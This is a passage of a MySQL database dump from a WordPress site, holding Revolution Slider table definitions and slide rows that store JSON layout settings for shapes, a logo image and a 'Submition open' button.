0.3)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\"},\"16\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":16,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"5700px\",\"e\":true},\"n\":{\"v\":\"5700px\"},\"t\":{\"v\":\"5700px\"},\"m\":{\"v\":\"5700px\"}},\"y\":{\"d\":{\"v\":\"-5300px\",\"e\":true},\"n\":{\"v\":\"-5300px\"},\"t\":{\"v\":\"-5300px\"},\"m\":{\"v\":\"-5300px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"relative\",\"zIndex\":10},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(225, 28, 89, 0.4)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5}}}','{\"version\":\"6.5.19\"}'),
(13,5,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/12.jpg\",\"imageId\":2731,\"imageFromStream\":true,\"imageLib\":\"medialibrary\",\"imageWidth\":1280,\"imageHeight\":695,\"imageRatio\":1.841726618705036},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\"}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":11},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":11}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":10},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":10}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":9},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":9}}}','{\"version\":\"6.5.19\"}'),
(14,4,3,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}');
/*!40000 ALTER TABLE `dnctiavkr_revslider_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_slides_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_slides_bkp`
--

LOCK TABLES `dnctiavkr_revslider_slides_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_static_slides`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_static_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_static_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_static_slides`
--

LOCK TABLES `dnctiavkr_revslider_static_slides` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_static_slides` DISABLE KEYS */;
INSERT INTO `dnctiavkr_revslider_static_slides` VALUES
(1,3,'{\"version\":\"6.6.0\",\"bg\":{\"image\":\"\"},\"slideChange\":{\"adpr\":false}}','[]','{\"version\":\"6.6.0\"}'),
(2,4,'{\"static\":{\"isstatic\":true},\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Global Layers\",\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\",\"adpr\":false},\"version\":\"6.6.0\"}','{\"18\":{\"text\":\"\",\"alias\":\"Logo\",\"uid\":18,\"media\":{\"imageUrl\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/P1.png\",\"imageId\":2267,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"124px\",\"e\":true},\"n\":{\"v\":\"124px\"},\"t\":{\"v\":\"124px\"},\"m\":{\"v\":\"124px\"}},\"height\":{\"d\":{\"v\":\"61px\",\"e\":true},\"n\":{\"v\":\"61px\"},\"t\":{\"v\":\"61px\"},\"m\":{\"v\":\"61px\"}},\"originalWidth\":1280,\"originalHeight\":628,\"aspectRatio\":{\"d\":{\"v\":2.038216560509554},\"n\":{\"v\":2.038216560509554},\"t\":{\"v\":2.038216560509554},\"m\":{\"v\":2.038216560509554}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"v\":\"487px\",\"e\":true},\"n\":{\"v\":\"487px\"},\"t\":{\"v\":\"487px\"},\"m\":{\"v\":\"487px\"}},\"y\":{\"d\":{\"v\":\"197px\",\"e\":true},\"n\":{\"v\":\"197px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"197px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"absolute\",\"zIndex\":14},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":1500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1490,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"use\":true,\"ease\":\"easeOutCirc\",\"speed\":2000,\"yoyo_move\":true,\"yoyo_scale\":true,\"yoyo_filter\":true,\"frame_0\":{\"y\":7}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"25\":{\"subtype\":\"roundbutton\",\"text\":\"SUBMITION OPEN  \",\"alias\":\"Button\",\"uid\":25,\"customCSS\":\"outline:none;\\nbox-shadow:none;\\nbox-sizing:border-box;\\n-moz-box-sizing:border-box;\\n-webkit-box-sizing:border-box;\",\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"267px\",\"e\":true},\"n\":{\"v\":\"267px\"},\"t\":{\"v\":\"267px\"},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"200px\",\"e\":true},\"n\":{\"v\":\"200px\"},\"t\":{\"v\":\"200px\"},\"m\":{\"v\":\"190px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"position\":\"absolute\",\"zIndex\":17},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":1500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1490,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true},\"n\":{\"v\":\"rgba(255,255,255,1)\"},\"t\":{\"v\":\"rgba(255,255,255,1)\"},\"m\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":true}},\"padding\":{\"d\":{\"v\":[16,40,16,40],\"e\":true},\"n\":{\"v\":[16,40,16,40],\"e\":false},\"t\":{\"v\":[16,40,16,40],\"e\":false},\"m\":{\"v\":[16,40,16,40],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"v\":\"18px\",\"e\":true},\"n\":{\"v\":\"18px\"},\"t\":{\"v\":\"18px\"},\"m\":{\"v\":\"24px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"34px\",\"e\":true},\"n\":{\"v\":\"34px\"},\"t\":{\"v\":\"34px\"},\"m\":{\"v\":\"34px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"cursor\":\"pointer\",\"backgroundColor\":\"{&type&:&linear&,&angle&:&135&,&colors&:[{&r&:49,&g&:244,&b&:247,&a&:1,&position&:0,&align&:&top&},{&r&:49,&g&:244,&b&:247,&a&:1,&position&:0,&align&:&bottom&},{&r&:3,&g&:102,&b&:160,&a&:1,&position&:53,&align&:&bottom&},{&r&:30,&g&:197,&b&:234,&a&:1,&position&:100,&align&:&bottom&},{&r&:30,&g&:197,&b&:234,&a&:1,&position&:100,&align&:&top&}],&easing&:&none&,&strength&:100}\",\"borderColor\":\"rgba(0,0,0,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true},\"n\":{\"v\":\"rgba(255,255,255,1)\"},\"t\":{\"v\":\"rgba(255,255,255,1)\"},\"m\":{\"v\":\"rgba(255,255,255,1)\",\"e\":true}}}},\"hover\":{\"usehover\":true,\"color\":\"rgba(255,255,255,1)\",\"backgroundColor\":\"{&type&:&linear&,&angle&:&225&,&colors&:[{&r&:130,&g&:35,&b&:172,&a&:&1&,&position&:0,&align&:&top&},{&r&:130,&g&:35,&b&:172,&a&:&1&,&position&:0,&align&:&bottom&},{&r&:187,&g&:5,&b&:129,&a&:&1&,&position&:53,&align&:&bottom&},{&r&:233,&g&:77,&b&:66,&a&:&1&,&position&:100,&align&:&bottom&},{&r&:233,&g&:77,&b&:66,&a&:&1&,&position&:100,&align&:&top&}]}\",\"borderColor\":\"rgba(0,0,0,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":\"solid\",\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":\"50\",\"originY\":\"50\",\"speed\":\"400\",\"svg\":{\"color\":\"rgba(255,255,255,1)\"}},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"\\/software-company\\/who-we-are\\/\",\"link_open_in\":\"_self\",\"link_follow\":\"follow\",\"jump_to_slide\":4,\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),
(3,5,'{\"static\":{\"isstatic\":true},\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Global Layers\",\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\"}}','{\"18\":{\"text\":\"\",\"alias\":\"Logo\",\"uid\":18,\"media\":{\"imageUrl\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/P1.png\",\"imageId\":2267,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"124px\",\"e\":true},\"n\":{\"v\":\"124px\"},\"t\":{\"v\":\"124px\"},\"m\":{\"v\":\"124px\"}},\"height\":{\"d\":{\"v\":\"61px\",\"e\":true},\"n\":{\"v\":\"61px\"},\"t\":{\"v\":\"61px\"},\"m\":{\"v\":\"61px\"}},\"originalWidth\":1280,\"originalHeight\":628,\"aspectRatio\":{\"d\":{\"v\":2.038216560509554},\"n\":{\"v\":2.038216560509554},\"t\":{\"v\":2.038216560509554},\"m\":{\"v\":2.038216560509554}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"v\":\"487px\",\"e\":true},\"n\":{\"v\":\"487px\"},\"t\":{\"v\":\"487px\"},\"m\":{\"v\":\"487px\"}},\"y\":{\"d\":{\"v\":\"197px\",\"e\":true},\"n\":{\"v\":\"197px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"197px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"relative\",\"zIndex\":14},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":1500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1490,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"use\":true,\"ease\":\"easeOutCirc\",\"speed\":2000,\"yoyo_move\":true,\"yoyo_scale\":true,\"yoyo_filter\":true,\"frame_0\":{\"y\":7}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"type\":\"image\"},\"25\":{\"subtype\":\"roundbutton\",\"text\":\"SUBMITION OPEN 